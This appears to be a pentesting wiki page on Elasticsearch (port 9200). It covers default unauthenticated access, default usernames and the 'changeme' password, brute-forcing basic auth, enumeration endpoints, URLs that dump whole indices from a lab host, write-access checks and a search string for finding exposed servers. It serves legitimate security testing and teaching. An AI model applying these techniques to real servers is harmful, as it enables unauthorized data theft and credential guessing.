9200 - Pentesting Elasticsearch
Last updated
Last updated
From the main page you can find some useful descriptions:
Elasticsearch is a distributed, open source search and analytics engine for all types of data, including textual, numerical, geospatial, structured, and unstructured. Elasticsearch is built on Apache Lucene and was first released in 2010 by Elasticsearch N.V. (now known as Elastic). Known for its simple REST APIs, distributed nature, speed, and scalability, Elasticsearch is the central component of the Elastic Stack, a set of open source tools for data ingestion, enrichment, storage, analysis, and visualization. Commonly referred to as the ELK Stack (after Elasticsearch, Logstash, and Kibana), the Elastic Stack now includes a rich collection of lightweight shipping agents known as Beats for sending data to Elasticsearch.
An Elasticsearch index is a collection of documents that are related to each other. Elasticsearch stores data as JSON documents. Each document correlates a set of keys (names of fields or properties) with their corresponding values (strings, numbers, Booleans, dates, arrays of values, geolocations, or other types of data).
Elasticsearch uses a data structure called an inverted index, which is designed to allow very fast full-text searches. An inverted index lists every unique word that appears in any document and identifies all of the documents each word occurs in.
During the indexing process, Elasticsearch stores documents and builds an inverted index to make the document data searchable in near real-time. Indexing is initiated with the index API, through which you can add or update a JSON document in a specific index.
Default port: 9200/tcp
The protocol used to access Elasticsearch is HTTP. When you access it via HTTP you will find some interesting information: http://10.10.10.115:9200/
If you don't see that response accessing /
see the following section.
By default Elasticsearch doesn't have authentication enabled, so by default you can access everything inside the database without using any credentials.
You can verify that authentication is disabled with a request to:
However, if you send a request to /
and receives a response like the following one:
That will means that authentication is configured an you need valid credentials to obtain any info from elasticserach. Then, you can try to bruteforce it **(it uses HTTP basic auth, so anything that BF HTTP basic auth can be used). Here you have a list default usernames: _elastic (superuser), remote_monitoring_user, beats_system, logstash_system, kibana, kibana_system, apm_system, _anonymous._ Older versions of Elasticsearch have the default password changeme** for this user
Here are some endpoints that you can access via GET to obtain some information about elasticsearch:
_cat | /_cluster | /_security |
/_cat/segments | /_cluster/allocation/explain | /_security/user |
/_cat/shards | /_cluster/settings | /_security/privilege |
/_cat/repositories | /_cluster/health | /_security/role_mapping |
/_cat/recovery | /_cluster/state | /_security/role |
/_cat/plugins | /_cluster/stats | /_security/api_key |
/_cat/pending_tasks | /_cluster/pending_tasks | |
/_cat/nodes | /_nodes | |
/_cat/tasks | /_nodes/usage | |
/_cat/templates | /_nodes/hot_threads | |
/_cat/thread_pool | /_nodes/stats | |
/_cat/ml/trained_models | /_tasks | |
/_cat/transforms/_all | /_remote/info | |
/_cat/aliases | ||
/_cat/allocation | ||
/_cat/ml/anomaly_detectors | ||
/_cat/count | ||
/_cat/ml/data_frame/analytics | ||
/_cat/ml/datafeeds | ||
/_cat/fielddata | ||
/_cat/health | ||
/_cat/indices | ||
/_cat/master | ||
/_cat/nodeattrs | ||
/_cat/nodes |
These endpoints were taken from the documentation where you can find more.
Also, if you access /_cat
the response will contain the /_cat/*
endpoints supported by the instance.
In /_security/user
(if auth enabled) you can see which user has role superuser
.
You can gather all the indices accessing http://10.10.10.115:9200/_cat/indices?v
To obtain information about which kind of data is saved inside an index you can access: http://host:9200/<index>
from example in this case http://10.10.10.115:9200/bank
If you want to dump all the contents of an index you can access: http://host:9200/<index>/_search?pretty=true
like http://10.10.10.115:9200/bank/_search?pretty=true
Take a moment to compare the contents of the each document (entry) inside the bank index and the fields of this index that we saw in the previous section.
So, at this point you may notice that there is a field called "total" inside "hits" that indicates that 1000 documents were found inside this index but only 10 were retried. This is because by default there is a limit of 10 documents.
But, now that you know that this index contains 1000 documents, you can dump all of them indicating the number of entries you want to dump in the size
parameter: http://10.10.10.115:9200/quotes/_search?pretty=true&size=1000
asd
Note: If you indicate bigger number all the entries will be dumped anyway, for example you could indicate size=9999
and it will be weird if there were more entries (but you should check).
In order to dump all you can just go to the same path as before but without indicating any indexhttp://host:9200/_search?pretty=true
like http://10.10.10.115:9200/_search?pretty=true
Remember that in this case the default limit of 10 results will be applied. You can use the size
parameter to dump a bigger amount of results. Read the previous section for more information.
If you are looking for some information you can do a raw search on all the indices going to http://host:9200/_search?pretty=true&q=<search_term>
like in http://10.10.10.115:9200/_search?pretty=true&q=Rockwell
If you want just to search on an index you can just specify it on the path: http://host:9200/<index>/_search?pretty=true&q=<search_term>
Note that the q parameter used to search content supports regular expressions
You can also use something like https://github.com/misalabs/horuz to fuzz an elasticsearch service.
You can check your write permissions trying to create a new document inside a new index running something like the following:
That cmd will create a new index called bookindex
with a document of type books
that has the attributes "bookId", "author", "publisher" and "name"
Notice how the new index appears now in the list:
And note the automatically created properties:
Some tools will obtain some of the data presented before:
port:9200 elasticsearch